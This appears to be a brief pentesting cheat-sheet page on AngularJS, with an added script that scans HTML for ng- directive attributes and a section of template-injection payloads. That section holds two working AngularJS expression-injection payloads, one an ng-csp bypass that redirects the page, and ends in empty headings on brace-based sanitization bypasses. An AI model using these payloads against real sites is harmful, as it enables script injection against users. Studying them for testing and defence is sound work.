Angular Pentesting

Last modified: 2023-07-12


AngularJS is a web application framework.

HTML Attributes

If a website uses the AngularJS framework, its nodes carry an “ng-app” attribute, so you can check for it in the HTML source code.

<div ng-app>
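
The attribute check above, run over saved HTML source, as an added example that is not part of the original page. It reports whether an ng-app root is present (in the ng-, data-ng-, x-ng- or ng: prefix forms AngularJS accepts), whether ng-csp is set, and which directive attributes carry expressions worth reviewing. The function names and the sample markup are constructed for illustration.

```javascript
// Added example (not from the original page): audit HTML source for AngularJS attributes.
// Matches the ng-, data-ng-, x-ng- and ng: attribute prefixes.
const NG_ATTR = /^(?:data-|x-)?ng[-:]([a-z][a-z0-9-]*)$/i;
const ATTR = /([^\s"'<>\/=]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+)))?/g;
const TAG = /<([a-zA-Z][\w-]*)((?:\s+[^\s"'<>\/=]+(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]+))?)*)\s*\/?>/g;

// Return one record per AngularJS directive attribute found in the markup.
function scanAngularAttributes(html) {
  const findings = [];
  for (const tag of html.matchAll(TAG)) {
    for (const attr of tag[2].matchAll(ATTR)) {
      const m = NG_ATTR.exec(attr[1]);
      if (!m) continue; // not an AngularJS attribute (e.g. class="ng-app")
      findings.push({
        tag: tag[1].toLowerCase(),
        directive: m[1].toLowerCase(),
        value: attr[2] || attr[3] || attr[4] || "",
      });
    }
  }
  return findings;
}

// Summarize: is the page an AngularJS app, is ng-csp set, and which
// directives carry expressions that deserve review.
function summarize(html) {
  const found = scanAngularAttributes(html);
  return {
    usesAngularJS: found.some((f) => f.directive === "app"),
    cspMode: found.some((f) => f.directive === "csp"),
    expressions: found.filter((f) => f.directive !== "app" && f.value !== ""),
  };
}

// Constructed sample markup, not taken from any real site.
const SAMPLE = '<div data-ng-app="demo" ng-csp><input ng-focus="onFocus($event)">' +
  '<p ng-bind=user.name></p><span class="ng-app">text</span></div>';

console.log(summarize(SAMPLE));
```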

Server-Side Template Injection (SSTI)

<input ng-focus=$event.view.alert('test')>

<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>

It is worth testing whether sanitization can be bypassed, as below.

# Remove one-pair braces

# Remove all braces

# Add additional braces